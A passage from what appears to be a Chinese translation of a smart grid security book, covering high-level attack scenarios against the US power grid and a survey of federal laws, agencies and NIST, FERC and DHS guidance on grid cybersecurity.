共鸣是,世界在2001年9月11日的攻击后变得再也不一样了。恐怖分子瞄准了纽约世界贸易中心并成功摧毁了双子塔。智能电网技术的采用会为美国的配电网络创建一个类似的中心。这个中心会成为诸如基地组织的国际恐怖组织的重要目标。 场景 (1)威胁:蒂埃里, 一名专业的受雇黑客,受雇于基地组织来攻击美国的智能电网。作为一名职业黑客,蒂埃里是受经济利益驱使的,尽管他对于和类似基地组织这样的恐怖组织做交易有所保留,但是他还是不能拒绝他们给出的价格。 (2)攻击途径:通过利用基于恶意电子邮件的社会工程(Social Engineering)攻击,蒂埃里能够创造一个感染美国大部分主要电力公司的蠕虫。蒂埃里的蠕虫具有命令和控制功能,这使得他获得了对于各个组织内部基础设施更大的访问权限。在蒂埃里执行攻击的时候,他具有了75%的较大 电力公司配电网络的管理访问权。 (3)影响:蒂埃里最终能够同时关闭美国75%的电力公司的发电。和前面的 国内的攻击者凯尔进行的攻击类似,恐慌之后是联邦、州和当地政府仓促的宣告事 故原因。然而,这次的范围遍及全国。这次电力闪烁覆盖了美国90%的用户并持 续长达三天,直到蠕虫被根除。造成的经济和心理的伤害几乎摧毁了美国,而它最 终的代价是不可计算的。 3)战争的前导 本章之前讨论的威胁阐述了潜在的针对组织、产业和国家的攻击可能造成的 影响。这些攻击的影响可能是经济上和心理上的。这些代价,尽管不能说对于国 家的长期发展没有危害,但是相比于类似的作为战争前导的攻击来说,其影响是微乎其微的。 场景 (1)威胁:X 国,厌倦了联合国对其实施的制裁,决定向美国宣战。尽管X 国 不 具有直接攻击美国的技术或装备,但由于他们已经在美国安插了秘密行动成员,他们 会在收到信号后实施自杀性袭击。为了最大化袭击的影响,X 国将美国部署的智能 电网基础设施作为攻击目标来制造混乱并切断居民、应急部门和政府的通信。 (2)攻击途径:利用智能电网基础设施使用的操作系统及网络服务中未上报 的漏洞,X 国能够同时关闭美国各个配电网络。由于存在漏洞的系统和设备的广 泛使用,这些攻击很容易进行。在之前几乎没人意识到这些被利用的漏洞。 (3)影响:随着遍及全国的电力闪烁影响到了几乎全部的美国人,接下来是巨 大的混乱。在攻击后不久,X国的秘密行动成员实行了自杀式攻击,进一步放大了 混乱的效应并使美国人民陷入极大的悲伤中。由于这次攻击,无数的美国人丧生, 而由于电力闪烁造成的被放大的混乱而丧生的人数更多。和前面提到的恐怖袭击 类似,破坏几乎毁灭了美国,而其最终的代价难以计算。 3.4 总结 智能电网技术给电力公司带来的好处是明显的。但是,这些技术带来的风险, 不管是对电力公司自己还是对依赖他们的人来说,也是同样明显的。传统的威胁, 诸如服务窃取和诈骗很可能成为主流。更糟糕的是,这些攻击途径很可能被记录 并在恶意的网站上传播,随之而来的是其他人在其他区域发动类似的攻击。 其他的威胁,比如可用性攻击,会对互联性更强的配电网络造成更大的影响。 电力公司会被认为是抵御这些威胁的第一层次。但是,为了抵御这些攻击,来自政 府、企业和消费者的协调合作必须能够有效和高效的进行。否则,电影《虎胆龙威》 中描述的“fire sale”很可能成为现实。 注意 售火(fire sale)是一个描述整个国家的包括电力配电在内的基础设施受到侵害的局面的术语。这种侵害主要是通过计算机入侵实现的。 智能电网安全中联邦政府的角色 保障智能电网安全是关乎国家安全的事情,因此,联邦政府会在指导安全工作 上扮演重要角色。电力公司和智能电网销售者会期望联邦政府能够对如何正确地 保障智能电网部署安全给出指导。幸运的是,几个联邦政府部门已经颁布了一些 安全指导和最佳实践,还有更多的也正在筹划之中。本章将讨论几个联邦政府部 门的职责,以及他们各自的方案。 4.1 美国联邦政府 从20世纪20年代开始,随着1920年联邦能源法案(Federal Power Act)的通 过,美国联邦政府就开始积极地规范能源产业。在接下来的50年中,能源产业被 一个碎片式的监管框架所管理。在1977年,根据能源部门组织法案建立了美国 能源部来负责组织这些细碎的过程并创建国家能源计划。 联邦能源管理委员会 (FERC) 也在1977年作为美国能源部内的一个独立管理部门被创建。这些部门在创建智能电网的国家计划中起到至关重要的作用。进一步讲,近期通过的一些法 案会直接影响智能电网的发展,这包括: 2007年的能源与独立安全法案 2009年的美国恢复与再投资法案 4.1.1 2007年的能源与独立安全法案 美国国会在2007年通过了能源与独立安全法案(EISA), 而总统布什在2007 年12月19日签署法案,该法案升级为法律,该法案成为了公共法律(Public Law) 的第110~140页。[2]这部分法律的文本可以在美国政府和出版办公室的网站上获 得 http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=110_cong_ public_laws&.docid=f:publ140.110.pdf。 具体来讲,能源与独立安全法案的 Tittle XIII 指出了联邦政府的办公政策是 支持电网的现代化,或者说是支持智能电网。此外,Tittle XII建立了智能电网咨 询委员会和智能电网工作促进会(Smart Grid Task Force),2]同时规定了这些团 体,联邦政府部门和组织的任务、责任和义务。智能电网咨询委员会的使命是向联 邦政府官员提供关于智能电网相关活动状态的咨询。2]智能电网工作促进会 (Smart Grid Task Force)的使命是确保联邦政府的智能电网相关活动清晰、协调、 一致的进行。[2]智能电网咨询委员会和智能电网工作促进会(Smart Grid Task Force) 会被包括以下部门的联邦机构监管: ● 能源部 ● 联邦能源管理委员会 ● 商务部 ● 环境保护局 ● 国土安全局 ● 农业部 ● 国防部 鉴于智能电网咨询委员会和智能电网工作促进会(Smart Grid Task Force)的 工作会极大地影响国家的智能电网政策,因此,他们的工作成果会被严密的监管。 4.1.2 2009年的美国复苏与再投资法案 2009年的美国复苏与再投资法案(ARRA) 在2009年2月17日被颁布,并成 为了公共法律的111-5条。4]这个法律可以在美国政府和出版办公室(Print Office)网站上得到 http://www.gpo.gov/fdsys/pkg/PLAW-11lpubl5/content-de- tail.html。从一个较高层面上说,ARRA 的创建是为了刺激美国的经济并包含了许多与 能源产业无关的条款。但是,ARRA 确实设置了327亿美元的一笔拨款来支持能 源相关项目。[4]在表4.1中可以看到拨款的全部分类。可以看到,很大一部分资金 被分配给了智能电网项目。然而,这种做法并不是毫无争议的。当45亿美元被分 配给智能电网项目时,电力和智能电网销售者注意到这一点并争先恐后的在此期 间来争取资助。结果是,开发技术和部署技术为了争取资助而被赶工。当技术被 赶工时,错误和安全漏洞的风险就极大的提高了。 某些其他法案也被引入并很快成为法律,比如电网可靠性和基础设施防御法 案[0],但是,政策的过程通常会对这些法案进行较大的修改,也有可能某些法案无 法成为法律。然而,这些法案需要被监控以防他们成为法律,这会戏剧性地改变组 织的管理需求。 4.2 美国能源部 作为2009年由ARRA 资助的智能电网投资拨款项目(SGIG) 的一部分,美国 能源部寻求一份大约为智能电网投资45亿美元的提案。在招标声明(Funding Opportunity Announcement,FOA)(确认一下)中有许多明文的规定。但是与本书 的主题相关的,只有FOA 特别包括的网络安全部分,它要求申请者阐明自己保证 网络安全的方法,并在文档的通篇包含对安全性的考虑。[申请的截止日期已经过 了,但是网络安全的要求仍然应该被重提,因为它提供了美国能源部对智能电网安 全性政策和过程的一瞥。美国能源部很可能会有下一步的资助计划,而这些计划 的要求很可能与之前类似。FOA 可以在http://www.energy.gov/media/xDE-FOA-00000.36.pdf 得到。 Tittle XII的最后一部分,1309节,“美国能源部关于智能电网安全属性的研 究”,赋予了美国能源部就智能电网的部署如何影响电网安全进行报告的责任。[2] 而许多政府部门也将会在智能电网的发展中起到作用。美国能源部特别的被指派 了监管和报告智能电网安全的责任。这份报告包含以下几方面的建议: (1)智能电网系统如何有效地减少针对国家电力系统的恶意攻击造成的干扰。 (2)智能电网系统如何在国家电力系统受到干扰后的恢复中起到作用。 (3)智能电网系统如何在发生局域、区域或全国的紧急情况时帮助维持国家 电力系统全国范围协作的通信和控制。 (4)如果某些智能电网没有被仔细的建立和管理,那么需要考虑哪些风险可 能导致安全威胁漏洞,这些危险如何被缓解。[2] 在2009年4月,爱达荷国家实验室撰写了一份题为《智能电网系统安全属性 研究——当前的网络安全事件》的文件,这份文件可以在http://www.inl.gov/ scada/publications/d/securing_the_smart_grid_current_issues.pdf 得到。这份文件的主题是为呈递给国会的报告能源独立性与安全条款(Energy Independence and Security Act,EISA)中 Tittle XIII 1309 章要求的部分提供信息。 但是,这份 文件并不是一份为四个要求中每一个都提供建议的综合性报告,而是一份用来支 持太平洋西北国家实验室(PNNL) 所做的完整报告的文件,这份完整的报告重点 阐述了当前电网的网络安全性。[8] 爱达荷国家实验室的文件通过将风险分为两类,讨论了当前智能电网的安全 形势。这两类风险是: ● 传统电网技术 ● 智能电网技术[8] 4.2.1 传统电网技术 明显地,实现智能电网不是一日之功。更进一步说,想要完全制造一个与当前 电网相映射的智能电网并实现某一天的完全切换在成本上和逻辑上都是不可行 的。因此,智能电网会通过逐步的将智能设备引入当前电网来一步步的实现。在 电网完全成为智能电网之前,由传统技术带来的风险仍然会影响电网。作为传统 电网技术的例子,爱荷华国家实验室的文件描述如下: ● 监管控制和数据获得(SCADA) ● 子站 ● 通信网络[8] SCADA 系统广泛地用于电网中的远程控制以及监控电力的传输和配电。81这 些系统通常直接连接到互联网上并受到远程操控。SCADA 系统和协议中的漏洞 已经被熟知并有多年的文案,其中还包括某些未被公布的漏洞。 工具 通常的漏洞扫描工具,比如Nessus 和 OpenVAS, 包含了检查某些已知的 SCADA漏洞,这些能够帮助你所在的组织在漏洞遭到恶意的利用前,识别并修复这些 漏洞。电网子站中通常安装了输电和配电设备,也包含了用来监视和控制这些设备 的自动化和通信设备。爱达荷国家实验的文档提到了子站中自动化的程度在提 升,而更重要的描述是“由于更高的自动化程度意味着更多的计算机控制电子设备 和软件,自动化程度是间接关系到安全性的。”[8]更高的自动化程度显然会降低人 为失误和错误造成的事故,但是如文件所述,增加的计算机控制电子设备和软件会 增加潜在的安全漏洞数量。电力公司利用通信网络支持他们的运行已经很多年了。用来支持他们通信网 络的媒介和协议现在在大多数工业中被使用,包括: ● 帧中继网络 ● 异步传输模式 ● 公共交换电话网(PSTN) ● 因特网 ● 无线技术 ● TCP/IP ● HTTP ● FTP[8] 影响这些方法和协议的漏洞已经被很好的记载了多年,他们会被用作黑客的 攻击途径。[8]大多数这些媒介和协议仍会被用在智能电网技术中,所以这些媒介和 协议带来的风险仍然存在。 警告 智能电网技术会被集成到传统技术中,因此在传统电网技术和新的智能电网技术 之间并没有逻辑的分界。因此,利用遗留系统的漏洞可能导致对新的智能电网科 技的危害。 4.2.2 当前的智能电网技术 除了遗留技术漏洞中的风险,电网还可能面临来自新的智能电网技术的风险。 爱达荷国家实验室的文件特别描述了三种用于智能电网的技术的当前安全状态: ● AMI (高级量测体系)安全 ● 无线网络安全 ● NASPI(North American SynPhasor Initiative)安全[8] 1)高级量测体系(AMI) 安全 高级量测体系(AMI) 可能是最被熟知的智能电网技术了。智能电表以及支撑 他们的基础设备在媒体上被广泛讨论,而已经被发现的存在于这些技术中的漏洞 也被很好地记录在案。爱达荷国家实验室的文档引用了特莱维斯·古德斯皮德和 马修·卡朋特的研究来说明已经存在的漏洞并阐明 AMI 现在的安全性是不足 的。[8]这个论断引起了广泛的回应并引发了关于责任的疑问。谁应该为AMI 的安 全负责?智能仪表技术销售商很容易成为目标,因为是他们开发的这些不安全的 设备。但是,电力公司也应该对没有向合作伙伴提出更高级别的安全需求而承担 责任。第9章,“第三方服务”,会更详细地讨论在处理科技销售者和第三方时的安 全提示和建议。 2)无线网络安全 在智能电网的部署中,会用到大量的无线网络技术来实现不同智能电网实体 间的通信。无线网络技术已经被安全漏洞问题困扰了很久,并且这很可能继续发 生在用于智能电网的无线网络技术中。因此,爱达荷国家实验室文件中建议对用 于智能电网的特定的无线网络进行更深入的研究。 3)NASPI 安全 智能电网基础设施会采用矢量测量单元(PMU) 来监控对电网的干扰。北美 同步矢量计划(North American SynPhasor Initiative,NASPI)正在寻求建立一套 通信网络来提供实时的对于PMU 的监控。由于PMU 尚未完成大规模的部署,爱 达荷国家实验室的文档中说明 NASPI 网络现在并不是关键性的。[81但是,这个网 络仍然应该被视为潜在的攻击弱点,并且随着更多的 PMU 的部署,风险还会增 加。尽管 PMU 尚未广泛部署,但作为基础支撑的通信网络设计安全的实施办法 的工作也应该开始了。 4.2.3 部署较少等于风险较小 爱达荷国家实验室文件中很有趣的一项表述是当前由于智能电网中漏洞带来 的对国家安全的风险并不显著。不幸的是,造成这种现象的原因并不是智能电网 技术的安全性较强,而是当前智能电网部署的规模较小。[8]在智能电网技术成为主 流之前,对它进行攻击的危险都被认为是不显著的。 总体上讲,爱达荷国家实验室的文件显示了大多数智能电网技术的安全性是 不够的。有大量的已经被识别的漏洞和安全标准缺失可以被利用,爱达荷国家实 验室的文件明确指出,为了保障智能电网安全我们需要做的更多。 4.3 联邦能源管理委员会 联邦能源管理委员会(FERC) 与美国能源部一样创建于1977年,并且合并了 几个诸如联邦能源委员会之类的机构功能。 FERC 是一个独立的,管理州际天然 气、原油、输电以及天然气和氢能源计划的美国联邦机构。 4.3.1 强制可靠性标准 在2005年能源政策条例下,FERC 获得了对可靠性标准进行管理并对不服从 者施加惩罚的权利。之后,FERC 指派北美可靠性联盟(North America Reliability Corporation,NERC) 作为电力可靠性组织并将创建可靠性标准的任务交给了 NERC 。进一步的,FERC 授权 NERC 通过严厉的经济处罚来强制执行这些可靠 性标准。想获得关于这个题目的更多的信息,或想了解如何避免严厉的经济处罚, 请看第6章“公共和私有公司”,这一章全面覆盖了NERC 以及他们的关键性基础设施保护标准。 4.3.2 智能电网政策 在2009年6月16日,FERC 发布了一项致力于加速国家智能电网发展的政 策。尽管政策覆盖了许多方面,这项安全性政策的重点还是放在了网络安全标准 的建立上。新的 FERC 政策可以在 http://www.ferc.gov/whats-new/comm-meet/2009/071609/E-3.pdf 找到。 注意 在“关键性标准建立”章节下的第一部分被命名为“系统安全”。这项产业发出了又 一个明确的信号,安全是首位的而不能符合安全标准会导致严厉的处罚 4.4 美国国家标准技术研究所 EISA 的1305章将协调智能电网互操作框架发展的责任分配给了美国国家标 准技术研究所。作为回应,美国国家标准技术研究所建立了如下的三步计划来创 建标准: 1)配套设施、设备供应商、消费者,标准创建者和其他参与者在智能电网标准 上达成一致。这个过程会包括计划在2009年5月19日~20日在华盛顿特区举行 的峰会。在入秋之前,这个过程会产生: (1)智能电网架构; (2)互操作性的优先权以及网络安全标准,以及初始的用来支撑智能电网实 现的标准集; (3)达到剩余标准需求的计划。 2)发起正式的合作契约来促进更多标准的产生,找到剩下的差距并集成新 技术。 3)建立测试和认证计划来保证智能电网设备和系统符合安全性和互操作性 标准。 4.4.1 NIST SP 1108 美国国家标准技术研究所为智能电网互操作性标准(NIST SP 1108)订立框架 和路线图是第一步的成果,它可以在http://nist.gov/public_affairs/releases/up- load/smartgrid_interoperability_final.pdf 上获得。安全性是NIST SP 1108 的主 要组成部分;但是,这份文件还包括了许多其他的超出本书范围的重要问题。本章 的这一部分会将重点放在 NIST SP 1108安全方面,我们非常建议读者阅读 NIST SP1108 的全部章节。 在2.3.1章中,我们讨论过智能电网架构。定义智能电网架构在决定如何正 确的在智能电网中集成安全性时是至关重要的。但是,电网的不同部分有不同的 需求,因此, 一种单独的架构很难满足这种需求。因此,国家的智能电网将采用多 种架构设计,而不是依赖于某种单独的架构。所以,NIST 定义了一系列需要的架 构属性,而不是试着去定义一种单独的、通用的智能电网架构。这些架构属性包括 每种架构都要包含的: (1)支持多种技术选择一不论是传统技术还是新技术。(架构应该足够灵活 来包含逐步进化的技术。他们也必须能支持标准的传统应用和设备的接口,尽量 避免追加的投资和/或定制。) (2)使用跨行业可用的、包含合适安全性的定义良好的接口。 (3)是由能够控制智能电网文档和复杂性的现代系统建模工具和技术开发的。 (4)架构元素适于位于架构内部的应用。(架构必须符合相关网络的使用年 限,根据网络类型可能从5年到30年,来支持大规模的、良好管理的安全的 网络。) (5)支持具有互操作性并且能够被集成到管理系统和网络安全基础设施中的 第三方产品。 (6)在自顶向下和自底向上的系统设计中找到合适的平衡。 (7)基于已被证明可用的企业级架构,软件和系统设计方法。[] 尽管这七条属性很重要,但他们并没有给电力公司或者智能电网销售者提供 具体的指导。沿着 NIST 的这三个步骤作为测试和认证智能电网和设备的计划前 进,或许能为这些属性增添一些细节,比如,企业级的架构、软件和系统设计方法需 要被确定是“已证明可用的”。然而,每个组织都应该准备好如何为他们包含了这 七种属性的专有架构辩护。 1)智能电网信息网络 NIST SP 1108中3.3节讨论了支撑国家智能电网的信息网络。国家智能电 网会包含属于许多组织和个人的网络。为了完成国家智能电网要求的互联性,每 个网络都要求能够满足一系列严格的互操作性需求。图4.1描述了NIST 对于这 些网络的设想。 在网络A 和网络 B之间要显著地布置防火墙。但是那是唯一 放置防火墙的位置吗?每个网络中都有许多部分,比如运营部分和市场部分。每 个部分会由一个或多个不同的部分(和网络)支持,这就降低了安全控制的效率,并 可能造成一个部分的威胁传递到所有的部分甚至是所有的网络中的情况。因此,如果整个电网是内部互联的, 一个网络中一个单独的漏洞都可能影响到整个智能 电网的安全情况。 2)包含的网络安全标准 NIST SP1108的4.3和4.4节列出了75种现存的与智能电网有关的标准、 规范、指南和要求。许多功能性领域都被这些标准覆盖了,而NIST 把他们分成了 不同的类别。在网络安全部分列出的文件在表4.2中。 在表4.2中列出的13个网络安全文件中,有经验的安全专家应该已经对至少 4个文件感到熟悉: NIST SP 800-53 NIST SP 800-82 ISO 27000 NIST FIPS 140-2 这些文件应用于许多产业中;但是,对于能源产业不熟悉的安全专家很可能需 要了解13个文件中剩余的几个。此外,只有NERCCIP 是电力公司需要强制遵守 的。其他文件包括对安全控制的建议,可以由组织机构自己分析决定是否要应用 到他们的环境中。 3)优先执行计划(Priority Action Plans) 在NIST SP 1108 中列出的文件并不代表集标准、规范、指导和要求于一身的 综合性表单。标准之间仍有规定不明确的地方需要被阐明,而NIST 已经创建了 优先执行计划来规范这些不明确之处。NIST SP 1108 中第5章详细描述了现存 的15个优先执行计划;但是,随着智能电网的升级,需要创建更多的优先执行计 划。 当引入新技术时,新的标准、规范、指导和要求也需要被创建,相应地, 一个 优先执行计划会以文件的形式发布。于是,组织机构需要经常检查NIST 的智能 电网页面(http://www.nist.gov/smartgrid) 来查找是否颁布了新的优先执行计 划以及新的标准、规范、指导和要求。优先执行计划带来的最大的影响是对智能网络会一直在变化这一事实的认 识。随着新技术的引入,新的威胁也将浮出水面。因此,电力公司和智能电网技术 售卖者必须能够升级他们的设备和技术来迎接随时变化的挑战。 4)其他的考虑 NIST SP1108的7.3节讨论了两种可能影响电网可用性的事件:电磁干扰和 电磁干涉。 电磁干扰包括类似电磁脉冲(EMP) 和由太阳风暴引起的地磁电流造 成的威胁。[ 在智能电网中这些干扰可能会为拒绝服务攻击创造条件,并影响通 信网络以及输电和配电网络。因此,智能电网互操作性组织(SGIP) 会进一步地研 究分析以制定更为可用的保护标准并对现有的标准做出修订使其适应智能电网的 威胁。 一个电磁脉冲是一次大量的电磁能量或辐射的爆发,可能造成电压激增从而 损坏电器。电磁脉冲可以通过若干种方式产生,比如核武器爆炸或其他非核的原 因,比如电磁炸弹。[2]当在地上爆炸时,这些武器将会有相对较小的暴露区域;然而,当在高海拔爆炸时,这些武器造成的电磁脉冲会具有大范围的毁灭效应。据估 计,140万吨的核弹在堪萨斯州上空250英里处爆炸,会毁灭美国大陆大多数未受 保护的电子设备。 经典失败案例 在1962年, 一次对原子弹的测试中,140万吨的核弹在 Johnston 岛上空 250英里处爆炸。夏威夷岛中坐落于Johnston 岛东800英里的Oahu 和 Kauai, 受到电磁脉冲的影响 , 导致街上 的路灯 、 保险丝和电话服务中断 。这是一次武器的测试 , 从某种意义上说 ,它或许是一次史诗般的成功 。 NIST 计划对电磁干涉对于智能电网通信技术的潜在影响进行进一步地研究。[] NIST 声明:“并不会强制规定智能电网使用的特定频率范围(有执照或没有执照的)或 使用的无线技术。”然而,基于他们研究的结果,如果一次大规模的电磁事故发生,那 么推荐的通信技术可能成为强制的 , 这将会导致智能电网的实现技术和设备将会有大 量的推荐更新。因此,可能会有几种新的规定来阐述针对智能电网安全的电磁威胁。 4.4.2 智能电网网络安全策略与要求 第6部分:网络安全策略和NIST SP1108中7.3.3节重点讨论了智能电网网 络安全策略和隐私问题,但是他们仅仅总结了另一份文件,NISTIR-7628: 智能电 网网络安全策略与要求。NISTIR-7628 现在处在第二稿阶段,并能从 http:// csrc.nist.gov/publications/drafts/nistir-7628/draft-nistir-7628_2nd-public-draft. pdf 获得。在撰写本书时,NISTIR-7628 仍然处在草稿阶段,所以仍有修改的可 能。但是,这篇文档中的主要信息不会改变。起初,创立智能电网网络安全策略与要求的任务是由网络安全协调任务组(CSCTG) 负责的,这个组已经被 SGIP 重新命名为网络安全工作组(SGIP CSWG) 。SGIP-CSWG 创建了五个高级任务来完成创建策略,如图4.2所示。每个 电力公司和智能电网技术售卖者应该使用一种他们熟悉的方法来制定适合于他们自 己的网络安全策略。NISTIR-7628 应该作为一种基准并为组织制定他们自己的网络安全策略提供指导 , 而不是令其他组织 强 制 使 用NISTIR-7628 网络安全策略 。 1)用例 和 NISTIR-7628 中其他的例子一样,附录 A 中列出的 NISTIR-7628 的用例 应该被用作所有组织的用例起点。许多这样的用例可以直接应用到其他的组织 机构中;但是,有些不能。所以,对于每个组织机构来说,通过分析选择与自己相 关的用例是非常重要的。例如, 一个智能仪表计价器和环境感应设备具有不同 的用例集,这是显而易见的,因为智能仪表和感应设备具有完全不同的使用 目的。 2)风险评估 SGIP-CSWG 使用表4.3 中列出的文件来指定对于智能电网的风险评估方 法。除了ISA 文档,表4.3中列出的每个文档都可以被免费下载。因此,使用这些 文档进行风险评估的组织不会有预算方面的顾虑。除了风险评估,这些文档在整 个风险管理生命周期中都是有用的,例如 DHS 的 NIPP 风险管理框架。此外,这些文档是被 SGIP-CSWG 用来建立风险评估方法的,但是,这不意味着每个智能电网组织都要使用这些文档。重要的是能够向审查者证明组织的风险评估是基于被认证过的、产业 内的知名标准。 3)高级安全要求 尽管有明确的要求,但是只有NISTIR-7628 列出的部分高级安全要求是需要 的,或者是需要被强制执行的。3]高级安全要求标准包括表4.2列出的安全标准 以及接下来表4.5中列出的附加安全标准。通过不停地学习成为一名在每个智能电网应用标准、指导、要求文档和框架的 专家似乎是一项令人望而却步的工作。本章列出了25项需要仔细学习的文档。 另人高兴的是类似 SGIP-CSWG 的组织已经为你做了许多基础工作,并且提供了 许多诸如第3章 NISTIR-7628 的“高级安全要求”中需求表之类的有用的工具。 此外,并不是每个文档都和你的组织或你的角色相关。但是,为了符合列出的文件 中定义的许许多多的需求,付出极大的努力是必须的。 提示 与规范不同,产业标准通常被认为是最好符合而不是完全必须的。但是,规范通常 是基于标准的,比如 NIST 颁布的标准。因此,智能电表相关组织能够通过遵守 NIST 颁布的标准,而不是等待标准成为相应规范以节省大量的时间和金钱。 4)标准和需求评估 当你拿自己组织的用例以及风险评估结果和NISTIR-7628 定义的需求标准 进行比较时,所有的用例和风险都被处理了吗?这个问题的答案很可能是否定的。 总体上讲,标准是为了能应用到尽可能多的组织和情况而撰写的,这意味着较为特 殊的条件没有被覆盖到。智能电网希望能够支持尽可能多的不同技术,因此,总有 特殊情况要求有另外的安全需求。 如果智能电网符合 NISTIR-7628 和 NIST SP 1108 定义的所有安全需求,智 能电网能免于网络攻击吗?当然不能!安全专家和类似联邦组织的安全机构的目 标是控制智能电网相关风险,而不是消除风险。消除风险是不可能实现的。NIS- TIR-7628 中描述的网络策略将防御作为一个主要目标,而对于网络攻击的响应和 恢复却被认为是关键性的需求。[13]如果你在一个组织中的角色是定义网络安全策 略,遵守NIST 文件中的安全需求和标准可能是你的一个目标,但并不是唯一的目标。 4.5 DHS NIPP 作为国土安全总统签署法案7的一部分,国土安全局被任命为国家的关键性 基础设施和关键性资源(CIKR) 制定国家基础设施保护计划(NIPP) 。[11具体来讲, NIPP 宣称的目标是“通过阻止、制止、中立化和缓解恐怖分子精心策划的毁灭、切 断和利用我们国家的CIKR 的计划,建立一个更安全,更机密,更有弹性恢复能力 的美国来增强国家在面对攻击、自然灾害或其他紧急事件时CIKR 的准备能力、及时响应能力和快速恢复能力。”[14]NIPP 是一份公众可以获取的文档,读者可以通 过表4.3中的连接获取。尽管2007年的 EISA 法案将协调智能电网网络安全工作的任务交给了 NIST,2002 年的国土安全条例却将增强包括智能电网在内的国家基础设施安全的 责任交给了国土安全局。因此,在两个组织的责任认定方面存在一些灰色区域,但目前两方面有很好的合作。例如,NISTIR-7628 将 DHS NIPP 作为一个进行风险评估的文档。原始的 NIPP 在2006年被创建,并在2009年进行了更新。在2009年的版本 中一项令人感兴趣的更新是增加了弹性恢复能力的重要性。[保护能力仍然被认 为是NIPP 的主要目标;但是,2009年版本的NIPP 倾向于用弹性恢复能力来平衡 安全策略。对于攻击的反应和恢复能力现在被认为是和保护能力同等重要的,这 点在 NISTIR-7628 网络安全策略中也得到了回应。 4.5.1 区域定制的计划 电网不是唯一一个被列为作为关键性基础设施的实体,而为了阐述各种不同 的关键性基础设施的特殊需求,DHS 创建了区域定制计划(Sector-Specific Plans, SSP) 。 共创建了18项SSPs 并且均可以在区域定制计划http://www.dhs.gov/files/programs/gc_ 1179866197607.shtm 上找到。草拟的能源区域定制计划可以 在 http://www.dhs.gov/xlibrary/assets/nipp-ssp-energy-redacted.pdf 下载。随着能源区域定制计划的发展,建立了如图4.4所示的通信网络图。大多数 通信通过私有(有线的和无线的)网络实现并且在公共网络中使用了租用线路。此外,这份图解中没有显示出电力公司到居民、商业以及工业用户的任何通信线路。 在智能电网中,消费者和智能电网之间使用的是双向通信线路。这些通信线路会使用多重的网络类型。尽管这样,这份文件还是包含了许多有价值的观点和信息 能够帮助电力公司和智能电网技术提供商来加强他们环境和产品的安全。 4.6 其他适用的规定 尽管已经有并且还会有更多的针对智能电网的计划和法案, 一些已经存在的 安全法案应该引起组织的重视。本章会讨论以下法案: ● 2008年的反身份盗窃执法及赔偿法案(The Identity Theft Enforcement and Restitution Act of 2008) ● 1986年的电子通信隐私法(Electronic Communications Privacy Act of 1986) ● 泄露告知法(Breach Notification Laws) ● 个人信息保护与电子文件法(Personal Information Protection and Elec- tronic Documents Act,PIPEDA)。 4.6.1 2008年的反身份盗窃执法及赔偿法案 2008年的识别窃取强制及补偿措施法案(The Identity Theft Enforcement and Restitution Act of 2008)修订现存法案使得联邦政府更加方便的起诉网络犯 罪。具体来讲,修订案中包括了涉及智能电网的网络盗窃和敲诈定罪的相关条 目。例如,考虑这样一种情况, 一名攻击者侵害了消费者的智能仪表并关闭了消费 者的电力供应。此后,攻击者要求消费者付给自己赎金来恢复他的供电。法律允 许联邦起诉这名攻击者,这可能需要电力公司提供网络和设备日志来作为攻击的 证据。 4.6.2 1986年的电子通信私有性法案 1986年的电子通信私有性法案(Electronic Communications Privacy Act of 1986)禁止政府在未经授权的情况下访问存储设备中的或传输过程中的电子通信 信息。电力公司需要在回应法律执行部门对消费者能源使用信息的申请时格外小 心。尽管电力公司需要通过有效的具有正当理由的申请,但自愿地向政府提供消 费者信息可能会被消费者起诉。第5章,“州与地方的安全计划”,会更具体地讨论 这些隐私事件。 4.6.3 泄露告知法 尽管已经多次尝试通过一项国家法律来要求公司立即披露对于用户数据的泄 露。但目前大多数尝试还没能通过成为法律,包括最近的数据责任和信用条例。 但是,46个州、哥伦比亚特区、波多黎各和维京群岛已经颁布了泄露告知法。[7]所 以, 一旦发生了用户数据泄露事件,电力公司需要准备好通知受影响的消费者。 4.6.4 个人信息保护和电子文件法案 美国不是唯一一个实现智能电网的国家。许多其他国家有自己的计划以及数 据隐私和安全保护法律。我们以加拿大为例,因为美国是包含加拿大在内的北美 电网的一部分。其中一项特殊的加拿大法律是个人信息保护和电子文件法案 (Personal Information Protection and Electronic Documents Act,PIPEDA),它是 关于数据隐私性的。规定要求组织机构遵守以下几项规定: ● 在使用或披露个人信息前要获得许可 ● 向个人解释收集信息的原因 ● 通过合法手段收集信息 ● 保证个人信息政策清晰易懂 ● 使用恰当的安全手段保护个人信息 ● 向个人提供访问其信息的便捷途径[18] 这些命令能实质性地影响隐私政策以及组织机构从智能电网收集数据的过 程。此外,任何美国智能电网相关的公司如果想要和其他国家开展业务,都要研究 确定哪些法律规定会影响到他们的产品或服务。智能电网设备具有收集大量受到 联邦法律保护的数据的可能。 1)非特定国家的隐私性指导 如果组织机构计划在不止一个国家运营,那么使用并不针对特定国家的隐私 性指导是一个确保其符合大多数隐私规定的不错的办法。具体来讲,下面列出的 不针对特定国家的指导提供了对隐私性的一些建议: ● 经济合作和发展组织(Organization for Economic Co-operation and Devel- opment) 关于隐私和跨境的个人数据传输指导:http://www.oecd.org/ document/18/0,3343,en_2649_34255_1815186 1 1 1 1,00.html ● 美国认证公共会计协会(American Institute of Certified Public Accounts) 和加拿大特许会计学会(Canada Institute of Chartered Accountants)共同 接 受 的 隐 私 原 则 :http://www.cica.ca/service-and-products/privacy/gen-accepted-privacy-principles/index.aspx。 4.7 倡导安全 联邦政府应该直接向组织和消费者提供智能电网中相关安全信息。尽管安全 专家意识到了智能电网中合适安全管控的重要性,但许多电力公司和智能电网运 营商的管理人员仍然认为网络安全威胁是不切实际的。未来的法律很可能强制要求采用联邦安全计划中大多数的安全需求保证。因此,组织机构最终还是需要遵 守这些安全需求的最佳实践。 4.8 智能电网安全的政府部门和政策 显然,联邦政府是一个很大的官方机构,能够影响到这些安全计划的结果。例 如,考虑已经实行的并作为 NIST SP 1108 的一部分讨论过的隐私权的影响评估 (Privacy Impact Assessment,PIA) 。Rebecca Herold,作为隐私权的影响评估工 作 的 领 导 者 , 在 她 的 博 客 上 (http://www.realtime-itcompliance.com/ index.html) 发表了关于在NIST 文件中撰写隐私影响评估的官僚程序的文章。隐 私权的影响评估报告的初稿长达22页;然而,只有7页被采纳。[用她的话说,“初 稿中包含的隐私影响评估的部分有7页。很多核心的隐私性和相关细节被删除 了,我是知道原因的。我将责任归于自己没能认识到政府官员的数量和必要的讨 论和解释,在报告发表前,应该确保所有NIST 的成员,不仅包括工作组内的人,还 有 